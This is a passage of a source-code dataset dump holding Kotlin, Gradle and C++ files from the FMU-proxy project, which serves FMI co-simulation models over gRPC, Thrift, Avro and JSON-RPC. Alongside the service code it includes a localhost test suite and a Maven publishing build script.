CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc.services\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmuproxy.grpc.Proto\n\ninternal fun FmiStatus.protoType(): Proto.Status {\n return when (this) {\n FmiStatus.OK -> Proto.Status.OK_STATUS\n FmiStatus.Warning -> Proto.Status.WARNING_STATUS\n FmiStatus.Discard -> Proto.Status.DISCARD_STATUS\n FmiStatus.Error -> Proto.Status.ERROR_STATUS\n FmiStatus.Fatal -> Proto.Status.FATAL_STATUS\n FmiStatus.Pending -> Proto.Status.PENDING_STATUS\n FmiStatus.NONE -> Proto.Status.UNRECOGNIZED\n }\n}\n\ninternal fun CommonModelDescription.protoType(): Proto.ModelDescription {\n\n return Proto.ModelDescription.newBuilder().also { builder ->\n\n builder.guid = guid\n builder.modelName = modelName\n builder.fmiVersion = fmiVersion\n builder.modelStructure = modelStructure.protoType()\n builder.addAllModelVariables(modelVariables.map { it.protoType() })\n license?.also { builder.license = it }\n copyright?.also { builder.copyright = it }\n author?.also { builder.author = it }\n version?.also { builder.version = it }\n license?.also { builder.license = it }\n generationTool?.also { builder.generationTool = it }\n generationDateAndTime?.also { builder.generationDateAndTime = it }\n\n }.build()\n\n}\n\ninternal fun IntegerVariable.protoType(): Proto.IntegerAttribute {\n return Proto.IntegerAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun RealVariable.protoType(): Proto.RealAttribute {\n return Proto.RealAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun StringVariable.protoType(): Proto.StringAttribute {\n return Proto.StringAttribute.newBuilder().also {builder ->\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun BooleanVariable.protoType(): Proto.BooleanAttribute {\n return Proto.BooleanAttribute.newBuilder().also {builder ->\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun EnumerationVariable.protoType(): Proto.EnumerationAttribute {\n return Proto.EnumerationAttribute.newBuilder().also {builder ->\n min?.also { builder.min = it }\n max?.also { builder.max = it }\n start?.also { builder.start = it }\n }.build()\n}\n\ninternal fun TypedScalarVariable<*>.protoType() : Proto.ScalarVariable {\n return Proto.ScalarVariable.newBuilder().also { builder ->\n\n builder.name = name\n builder.valueReference = valueReference\n\n declaredType?.also { builder.declaredType = it }\n description?.also { builder.description = it }\n causality?.also { builder.causality = it.protoType() }\n variability?.also { builder.variability = it.protoType() }\n initial?.also { builder.initial = it.protoType() }\n\n when (this) {\n is IntegerVariable -> builder.integerAttribute = this.protoType()\n is RealVariable -> builder.realAttribute = this.protoType()\n is StringVariable -> builder.stringAttribute = this.protoType()\n is BooleanVariable -> builder.booleanAttribute = this.protoType()\n is EnumerationVariable -> builder.enumerationAttribute = this.protoType()\n else -> throw AssertionError()\n }\n\n }.build()\n\n}\n\n\ninternal fun Double.protoType(): Proto.Real {\n return Proto.Real.newBuilder().setValue(this).build()\n}\n\ninternal fun Boolean.protoType(): Proto.Bool {\n return Proto.Bool.newBuilder().setValue(this).build()\n}\n\ninternal fun ModelStructure.protoType(): Proto.ModelStructure {\n return Proto.ModelStructure.newBuilder()\n .addAllOutputs(outputs.map { it.protoType() })\n .addAllDerivatives(derivatives.map { it.protoType() })\n .addAllInitialUnknowns(initialUnknowns.map { it.protoType() })\n .build()\n}\n\ninternal fun Unknown.protoType(): Proto.Unknown {\n return Proto.Unknown.newBuilder().also { builder ->\n builder.index = index\n builder.addAllDependencies(dependencies)\n\n dependenciesKind?.also { builder.dependenciesKind = it.protoType() }\n\n }.build()\n}\n\ninternal fun DependenciesKind.protoType(): Proto.DependenciesKind {\n\n return when (this) {\n DependenciesKind.CONSTANT -> Proto.DependenciesKind.CONSTANT_KIND\n DependenciesKind.DEPENDENT -> Proto.DependenciesKind.DEPENDENT_KIND\n DependenciesKind.DISCRETE -> Proto.DependenciesKind.DISCRETE_KIND\n DependenciesKind.TUNABLE -> Proto.DependenciesKind.TUNABLE_KIND\n else -> Proto.DependenciesKind.UNRECOGNIZED\n }\n\n}\n\ninternal fun Causality.protoType(): Proto.Causality {\n\n return when (this) {\n Causality.INPUT -> Proto.Causality.INPUT_CAUSALITY\n Causality.OUTPUT -> Proto.Causality.OUTPUT_CAUSALITY\n Causality.CALCULATED_PARAMETER -> Proto.Causality.CALCULATED_PARAMETER_CAUSALITY\n Causality.PARAMETER -> Proto.Causality.PARAMETER_CAUSALITY\n Causality.LOCAL -> Proto.Causality.LOCAL_CAUSALITY\n Causality.INDEPENDENT -> Proto.Causality.INDEPENDENT_CAUSALITY\n else -> Proto.Causality.UNRECOGNIZED\n }\n\n}\n\ninternal fun Variability.protoType(): Proto.Variability {\n\n return when (this) {\n Variability.CONSTANT -> Proto.Variability.CONSTANT_VARIABILITY\n Variability.CONTINUOUS -> Proto.Variability.CONTINUOUS_VARIABILITY\n Variability.DISCRETE -> Proto.Variability.DISCRETE_VARIABILITY\n Variability.FIXED -> Proto.Variability.FIXED_VARIABILITY\n Variability.TUNABLE -> Proto.Variability.TUNABLE_VARIABILITY\n else -> Proto.Variability.UNRECOGNIZED\n }\n\n}\n\ninternal fun Initial.protoType(): Proto.Initial {\n\n return when (this) {\n Initial.CALCULATED -> Proto.Initial.CALCULATED_INITIAL\n Initial.EXACT -> Proto.Initial.EXACT_INITIAL\n Initial.APPROX -> Proto.Initial.APPROX_INITIAL\n else -> Proto.Initial.UNRECOGNIZED\n }\n\n}\n\n//internal fun TypedScalarVariable<*>.protoStartType(): Proto.AnyPrimitive {\n// return if (start != null) {\n// Proto.AnyPrimitive.newBuilder().also { builder ->\n// when (this) {\n// is IntegerVariable -> builder.intValue = start!!\n// is RealVariable -> builder.realValue = start!!\n// is StringVariable -> builder.strValue = start\n// is BooleanVariable -> builder.boolValue = start!!\n// is EnumerationVariable -> builder.enumValue = start!!\n// else -> throw UnsupportedOperationException(\"Variable type not supported: ${this::class.java.simpleName}\")\n// }\n// }.build()\n//\n// } else {\n// Proto.AnyPrimitive.getDefaultInstance()\n// }\n//}\n\n//internal fun TypedScalarVariable<*>.protoVariableType(): Proto.VariableType {\n// return when(this) {\n// is IntegerVariable -> Proto.VariableType.INTEGER_VARIABLE\n// is RealVariable -> Proto.VariableType.REAL_VARIABLE\n// is StringVariable -> Proto.VariableType.STRING_VARIABLE\n// is BooleanVariable -> Proto.VariableType.BOOLEAN_VARIABLE\n// is EnumerationVariable -> Proto.VariableType.ENUMERATION_VARIABLE\n// else -> throw UnsupportedOperationException(\"$this is not a supported variable type!\")\n// }\n//}\n\n" }, { "alpha_fraction": 0.6324833631515503, "alphanum_fraction": 0.6371951103210449, "avg_line_length": 30.65350914001465, "blob_id": "e93797266702056877d411aa8e689632ed36164c", "content_id": "98cd80bd94b7e593e26df886435627eafd257eb8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7216, "license_type": "permissive", "max_line_length": 122, "num_lines": 228, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestProxy.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuClient\nimport no.mechatronics.sfi.fmuproxy.avro.AvroFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuClient\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.*\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.net.FmuProxyServer\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuClient\nimport no.mechatronics.sfi.fmuproxy.thrift.ThriftFmuServer\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport kotlin.system.measureTimeMillis\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestProxy {\n\n companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(TestProxy::class.java)\n\n private const val stepSize: Double = 1.0 / 100\n private const val stopTime: Double = 5.0\n\n private const val httpPort: Int = 8003\n private const val wsPort: Int = 8004\n private const val tcpPort: Int = 8005\n private const val zmqPort: Int = 8006\n\n }\n\n private val fmu: Fmu\n private val proxy: FmuProxy\n\n private val grpcServer: FmuProxyServer\n private val avroServer: FmuProxyServer\n private val thriftServer: FmuProxyServer\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/OpenModelica/v1.11.0/WaterTank_Control/WaterTank_Control.fmu\"))\n\n grpcServer = GrpcFmuServer(fmu)\n avroServer = AvroFmuServer(fmu)\n thriftServer = ThriftFmuServer(fmu)\n\n proxy = FmuProxyBuilder(fmu).apply {\n addServer(grpcServer)\n addServer(thriftServer)\n addServer(avroServer)\n RpcHandler(RpcFmuService(fmu)).also { handler ->\n addServer(FmuProxyJsonHttpServer(handler), httpPort)\n addServer(FmuProxyJsonWsServer(handler), wsPort)\n addServer(FmuProxyJsonTcpServer(handler), tcpPort)\n addServer(FmuProxyJsonZmqServer(handler), zmqPort)\n }\n\n }.build()\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n\n @AfterAll\n fun tearDown() {\n proxy.stop()\n fmu.close()\n }\n\n\n @Test\n fun testGetPort() {\n Assertions.assertEquals(httpPort, proxy.getPortFor<FmuProxyJsonHttpServer>())\n Assertions.assertEquals(wsPort, proxy.getPortFor<FmuProxyJsonWsServer>())\n Assertions.assertEquals(tcpPort, proxy.getPortFor<FmuProxyJsonTcpServer>())\n Assertions.assertEquals(zmqPort, proxy.getPortFor<FmuProxyJsonZmqServer>())\n }\n\n @Test\n fun getServer() {\n Assertions.assertEquals(grpcServer, proxy.getServer<GrpcFmuServer>())\n Assertions.assertEquals(avroServer, proxy.getServer<AvroFmuServer>())\n Assertions.assertEquals(thriftServer, proxy.getServer<ThriftFmuServer>())\n }\n\n private fun runInstance(instance: FmiSimulation) : Long {\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n return measureTimeMillis {\n while (instance.currentTime < stopTime) {\n val status = instance.doStep(stepSize)\n Assertions.assertTrue(status)\n }\n }\n\n }\n\n @Test\n fun testGrpc() {\n\n proxy.getPortFor<GrpcFmuServer>()?.also { port ->\n\n GrpcFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"gRPC duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testThrift() {\n\n proxy.getPortFor<ThriftFmuServer>()?.also { port ->\n ThriftFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"Thrift duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testAvro() {\n\n proxy.getPortFor<AvroFmuServer>()?.also { port ->\n AvroFmuClient(\"localhost\", port).use { client ->\n\n val mdLocal = fmu.modelDescription\n val mdRemote = client.modelDescription\n\n Assertions.assertEquals(mdLocal.guid, mdRemote.guid)\n Assertions.assertEquals(mdLocal.modelName, mdRemote.modelName)\n Assertions.assertEquals(mdLocal.fmiVersion, mdRemote.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"Avro duration: ${it}ms\")\n }\n\n }\n }\n }\n\n }\n\n @Test\n fun testJsonRpc() {\n\n val host = \"localhost\"\n val clients = listOf(\n RpcHttpClient(host, proxy.getPortFor<FmuProxyJsonHttpServer>()!!),\n RpcWebSocketClient(host, proxy.getPortFor<FmuProxyJsonWsServer>()!!),\n RpcTcpClient(host, proxy.getPortFor<FmuProxyJsonTcpServer>()!!),\n RpcZmqClient(host, proxy.getPortFor<FmuProxyJsonZmqServer>()!!)\n ).map { JsonRpcFmuClient(it) }\n\n\n val md = fmu.modelDescription\n\n clients.forEach { client ->\n\n LOG.info(\"Testing client of type ${client.javaClass.simpleName}\")\n\n Assertions.assertEquals(md.guid, client.guid)\n Assertions.assertEquals(md.modelName, client.modelName)\n Assertions.assertEquals(md.fmiVersion, client.fmiVersion)\n\n client.newInstance().use { instance ->\n\n runInstance(instance).also {\n LOG.info(\"${client.javaClass.simpleName} duration: ${it}ms\")\n }\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.5728408098220825, "alphanum_fraction": 0.5827262997627258, "avg_line_length": 27.894737243652344, "blob_id": "a58fc718971e9a40c9c964ffc2e3ccd46402b58c", "content_id": "fd2831dfeaaad158901ac6e33da451dc07e373b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 3844, "license_type": "permissive", "max_line_length": 148, "num_lines": 133, "path": "/java/FMU-proxy/rpc-definitions/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nplugins {\n id \"com.google.protobuf\" version \"0.8.5\"\n id \"org.jruyi.thrift\" version \"0.4.0\"\n id \"com.commercehub.gradle.plugin.avro-base\" version \"0.14.1\"\n}\n\napply plugin: 'maven'\napply plugin: 'signing'\n\ngroup = 'no.mechatronics.sfi.fmuproxy'\nversion = '0.1-SNAPSHOT'\n\ndef definitions = \"../../../rpc-definitions\"\n\ndependencies {\n compile group: 'org.apache.thrift', name: 'libthrift', version: '0.11.0'\n\n compile group: 'io.grpc', name: 'grpc-stub', version: '1.12.0'\n compile group: 'io.grpc', name: 'grpc-protobuf', version: '1.12.0'\n\n compile group: 'org.apache.avro', name: 'avro', version: '1.8.2'\n compile group: 'org.apache.avro', name: 'avro-ipc', version: '1.8.2'\n}\n\navro {\n fieldVisibility = \"PRIVATE\"\n}\n\ntask generateAvroProtocol(type: com.commercehub.gradle.plugin.avro.GenerateAvroProtocolTask) {\n source(\"${definitions}/avro\")\n outputDir = file(\"build/avpr\")\n}\n\ntask generateAvro(type: com.commercehub.gradle.plugin.avro.GenerateAvroJavaTask) {\n source(\"build/avpr\")\n outputDir = file(\"build/avro\")\n}\ngenerateAvro.dependsOn(generateAvroProtocol)\ncompileJava.source(generateAvro.outputs)\n\nprotobuf {\n generatedFilesBaseDir = \"$projectDir/build\"\n protoc {\n artifact = 'com.google.protobuf:protoc:3.5.1'\n }\n plugins {\n grpc {\n artifact = 'io.grpc:protoc-gen-grpc-java:1.12.0'\n }\n }\n generateProtoTasks {\n\n ofSourceSet('main')*.plugins {\n grpc {\n outputSubDir = 'java'\n }\n }\n }\n\n}\n\nsourceSets {\n main {\n proto {\n srcDir \"${definitions}/proto\"\n }\n }\n}\n\nimport org.apache.tools.ant.taskdefs.condition.Os\n\ndef thriftPath = System.getenv(\"THRIFT_COMPILER\")\ndef supportsThrift = Os.isFamily(Os.FAMILY_WINDOWS) && thriftPath != null\n\nif (supportsThrift) {\n compileThrift {\n thriftExecutable \"$thriftPath/thrift.exe\"\n createGenFolder false\n generator 'java', 'private-members'\n sourceItems \"${definitions}/thrift\"\n }\n} else {\n logger.warn(\"Cannot generate Thrift sources! OS is Windows? Location of Thrift.exe specified by THRIFT_COMPILER added to ENVIRONMENT variable?\")\n}\n\nsigning {\n sign configurations.archives\n}\n\nuploadArchives {\n repositories {\n mavenDeployer {\n beforeDeployment { MavenDeployment deployment -> signing.signPom(deployment) }\n\n repository(url: \"https://oss.sonatype.org/service/local/staging/deploy/maven2\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n snapshotRepository(url: \"https://oss.sonatype.org/content/repositories/snapshots\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n pom.project {\n name archivesBaseName\n packaging 'jar'\n // optionally artifactId can be defined here\n description 'Generated thrift sources for use by FMU-proxy'\n url 'https://github.com/SFI-Mechatronics/gRPC-FMU'\n\n scm {\n connection 'scm:git:git://github.com/SFI-Mechatronics/gRPC-FMU.git'\n developerConnection 'scm:git:ssh://github.com/SFI-Mechatronics/gRPC-FMU.git'\n url 'https://github.com/SFI-Mechatronics/gRPC-FMU/tree/master'\n }\n\n licenses {\n license {\n name 'The MIT License'\n url 'https://opensource.org/licenses/mit-license.php'\n }\n }\n\n developers {\n developer {\n id 'laht'\n name 'Lars Ivar Hatledal'\n email '[email protected]'\n }\n }\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.6859503984451294, "alphanum_fraction": 0.7028728723526001, "avg_line_length": 30.75, "blob_id": "4b5127cbc3541f73d97ddd49926f3ec5e5925de9", "content_id": "017cd6624600d9468fe39b747fe9a6657d03f1dd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2541, "license_type": "permissive", "max_line_length": 121, "num_lines": 80, "path": "/cpp/FMU-proxy/test/FmuTest.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include <boost/filesystem.hpp>\n\n#include <fmilib.h>\n\n#include \"../common/FmuWrapper.h\"\n#include \"../common/thrift-gen/definitions_types.h\"\n\nusing namespace std;\nusing namespace fmuproxy;\nusing namespace boost::filesystem;\n\n\nint main(int argc, char **argv) {\n\n string fmu_path = string(string(getenv(\"TEST_FMUs\")))\n + \"/FMI_2.0/CoSimulation/linux64/20sim/4.6.4.8004/ControlledTemperature/ControlledTemperature.fmu\";\n\n FmuWrapper fmu = FmuWrapper(fmu_path.c_str());\n\n auto md = fmu.getModelDescription();\n cout << md->defaultExperiment << endl;\n\n for (auto var : md->modelVariables) {\n cout << var.attribute.realAttribute << endl;\n }\n\n shared_ptr<FmuInstance> instance1 = fmu.newInstance();\n shared_ptr<FmuInstance> instance2 = fmu.newInstance();\n\n instance1->init(0.0, -1);\n instance2->init(0.0, -1);\n\n RealRead read;\n\n instance1->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n double dt = 1.0/100;\n\n StepResult result;\n instance1->step(dt, result);\n\n instance1->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n\n instance1->terminate();\n\n instance2->getReal(\"Temperature_Room\", read);\n cout << \"Temperature_Room=\" << read.value << endl;\n\n instance2->terminate();\n\n return 0;\n\n}\n\n" }, { "alpha_fraction": 0.6456289887428284, "alphanum_fraction": 0.6507462859153748, "avg_line_length": 27.609756469726562, "blob_id": "081ae708e00ba5917a3478b7836c7d9ee9b973aa", "content_id": "5ae56eac16939b0331ffc1079dfc97ec181855e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2345, "license_type": "permissive", "max_line_length": 81, "num_lines": 82, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/fmu/Fmus.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.fmu\n\n\nimport no.mechatronics.sfi.fmi4j.common.FmiSimulation\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.util.concurrent.atomic.AtomicInteger\n\n/**\n * @author Lars Ivar Hatledal\n */\nobject Fmus {\n\n private val LOG: Logger = LoggerFactory.getLogger(Fmus::class.java)\n\n private val idGen = AtomicInteger(0)\n private val fmus = mutableMapOf<Int, FmiSimulation>()\n\n init {\n Runtime.getRuntime().addShutdownHook(Thread {\n terminateAll()\n })\n }\n\n fun put(fmu: FmiSimulation): Int {\n return idGen.incrementAndGet().also {\n fmus[it] = fmu\n }\n }\n\n fun remove(id: Int): FmiSimulation? {\n return fmus.remove(id).also {\n if (it == null) {\n LOG.warn(\"No fmu with id: $id\")\n }\n }\n }\n\n fun get(id: Int): FmiSimulation? {\n return fmus[id].also {\n if (it == null) {\n LOG.warn(\"No fmu with id: $id\")\n }\n }\n }\n\n\n fun terminateAll() {\n fmus.values.forEach {\n if (!it.isTerminated) {\n it.terminate()\n }\n }\n }\n\n\n\n}" }, { "alpha_fraction": 0.6428015828132629, "alphanum_fraction": 0.6463034749031067, "avg_line_length": 34.16438293457031, "blob_id": "1cebf6cd6ed6356355ed76eb4d7acd8d484a0825", "content_id": "0f12f9e7ed21feaa5f9a96212b6e749eb07c161d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2570, "license_type": "permissive", "max_line_length": 81, "num_lines": 73, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/utils/utils.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.utils\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport java.io.File\nimport java.io.FileOutputStream\nimport java.io.InputStream\nimport java.util.zip.ZipEntry\nimport java.util.zip.ZipInputStream\n\n\ninternal fun isArray(name: String) : Boolean {\n return \"[\" in name && \"]\" in name\n}\n\ninternal fun getProtoType(variable: TypedScalarVariable<*>): String {\n\n return when (variable) {\n is IntegerVariable -> \"Int\"\n is RealVariable -> \"Real\"\n is StringVariable -> \"Str\"\n is BooleanVariable -> \"Bool\"\n is EnumerationVariable -> \"Int\"\n else -> throw RuntimeException()\n }\n\n}\n\ninternal fun copyZippedContent(baseFile: File, content: InputStream) {\n\n ZipInputStream(content).use { zis ->\n var nextEntry: ZipEntry? = zis.nextEntry\n while (nextEntry != null) {\n if (!nextEntry.isDirectory) {\n File(baseFile, nextEntry.name).also { file ->\n if (!file.exists()) {\n if (!file.parentFile.exists()) {\n file.parentFile.mkdirs()\n }\n FileOutputStream(file).use { fis ->\n zis.copyTo(fis)\n }\n }\n }\n }\n nextEntry = zis.nextEntry\n }\n }\n\n}\n\n\n\n" }, { "alpha_fraction": 0.6871174573898315, "alphanum_fraction": 0.6973185539245605, "avg_line_length": 32.778324127197266, "blob_id": "26cba9fc03a09793964c6b3bd92f8c992059c6a8", "content_id": "65c7eddb9aa65f4ad13d260455ad7912067e0299", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6862, "license_type": "permissive", "max_line_length": 137, "num_lines": 203, "path": "/cpp/FMU-proxy/common/FmuWrapper.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#include <iostream>\n\n#include \"ThriftHelper.h\"\n#include \"FmuHelper.h\"\n#include \"FmuWrapper.h\"\n\n#define RELTOL 1E-4\n\nusing namespace ::fmuproxy;\nusing namespace ::fmuproxy::thrift;\nusing namespace ::fmuproxy::thrift_helper;\nusing namespace boost::filesystem;\n\n\nFmuWrapper::FmuWrapper (const char* fmu_path) {\n\n this->tmp_path = temp_directory_path() /= path(fmu_path).stem();\n create_directories(tmp_path);\n\n this->callbacks = create_callbacks(jm_log_level_nothing);\n\n this->ctx = fmi_import_allocate_context(&callbacks);\n this->version = fmi_import_get_fmi_version(ctx, fmu_path, tmp_path.c_str());\n\n this->xml = load_model_description(tmp_path.c_str(), ctx, callbacks);\n\n 